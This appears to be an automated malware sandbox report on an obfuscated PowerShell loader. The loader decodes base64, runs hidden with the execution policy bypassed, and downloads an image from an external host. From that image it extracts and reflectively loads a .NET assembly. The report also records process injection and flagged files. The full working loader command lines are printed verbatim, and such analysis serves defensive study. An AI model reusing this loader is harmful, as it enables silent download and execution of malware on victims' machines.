TQBXAE0ANABMAFQAWQAnACsAJwB4AE0ARAAnACsAJwBZADEATwBEAEkAeABQAFcANQBsAGEAMgA5ADAASgBtAEYAcABaAEcAVgB0AFAAWABSAHMAWQBUADkAMABlAEgAUQB1AE4ARABaAGwAYwAyAEYAaQBjAEcAOQBqAGMAMgBWAHoAZQBXADAAdgBiAHkAOQB0ACcAKwAnAGIAMgBNAHUAZABHADkAdwBjADMAQgB3AFkAUwA0ADIATgBHAEUAeABNAGkAMQBrAGEAVwA5AHkAWgBDADkAJwArACcAaQBMAHoAQgAyAEwAMgAxAHYAWQB5ADUAegBhAFgAQgBoAFoAVwB4AG4AYgAyADkAbgBMAG0AVgBuAFkAWABKAHYAZABIAE4AbABjADIARgBpAFoAWABKAHAAWgBpADgAdgBPAG4ATgB3AGQASAAnACsAJwBSAG8AewAwAH0AIAAsACAAewAwAH0AZABmAGQAZgBkAHsAMAB9ACAALAAgAHsAMAB9AGQAZgBkAGYAewAwAH0AIAAsACAAewAwAH0AZABmAGQAZgB7ADAAfQAgACwAIAB7ADAAfQBkAGEAZABzAGEAewAwAH0AIAAsACAAewAnACsAJwAwAH0AZABlAHsAMAB9ACAALAAgAHsAMAB9AGMAdQB7ADAAfQApACcAKwAnACkAJwApAC0AZgAgACAAWwBDAEgAYQBSAF0AMwA5ACwAWwBDAEgAYQBSAF0AMwA2ACkAIAApAA==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
parent_process powershell.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $PShOme[4]+$pSHoME[34]+'X')((('{1}imageUrl = {0}https://uploaddeimagens.co'+'m.br/images/004/667/608/original/hta.jpg?1700268840{0};{1}webClien'+'t = New-Object System.Net.We'+'bClient;{1}imageBytes'+' = {1}webClient.DownloadData({1}imag'+'eUrl);{1}imag'+'eText = '+'[System.Text.Encoding]::UTF8.GetString({1}imag'+'eBytes);{1}startFlag = {0}<<BASE64_START>>{0};{1}endFlag = {0}<<BASE64_END'+'>>{0};{1}startIndex = {1}imageTex'+'t.Inde'+'xOf({1}startFlag);{'+'1}endIndex = {1}imageText.IndexOf({1'+'}'+'endFlag);{1}s'+'tartIn'+'dex -ge 0 -and {1}e'+'ndIndex -gt {1}startIndex;{1}sta'+'rtIndex += {1}'+'sta'+'r'+'tFlag.Length;{1}base64Length = {1}en'+'dIndex - {1}startIndex;{1}base64Comma'+'nd = {1}im'+'ageText.Substring({1}startI'+'ndex, {1}base64Length);{1}commandBytes = [Syst'+'em.Convert]::FromBase64String({1}base64C'+'ommand);{1}loadedAssembly = [System.Reflection.Assembly]::Lo'+'ad({1}commandBytes);{1}type = {1}loadedAssembly.GetType({0}Fiber.Home{0});{1}method = {1}type.GetMethod({0}VAI{0}).Invoke({1}null, [object[]] ({0}MjQwY2YzZDE5OTBhLWE1YmEtZTEx'+'NC0zMWM4LTY'+'xMD'+'Y1ODIxPW5la290JmFpZGVtPXRsYT90eHQuNDZlc2FicG9jc2VzeW0vby9t'+'b2MudG9wc3BwYS42NGExMi1kaW9yZC9'+'iLzB2L21vYy5zaXBhZWxnb29nLmVnYXJvdHNlc2FiZXJpZi8vOnNwdH'+'Ro{0} , {0}dfdfd{0} , {0}dfdf{0} , {0}dfdf{0} , {0}dadsa{0} , {'+'0}de{0} , {0}cu{0})'+')')-f [CHaR]39,[CHaR]36) )"
Process injection Process 2624 resumed a thread in remote process 2712
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x0000000000000358
suspend_count: 1
process_identifier: 2712
1 0 0
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe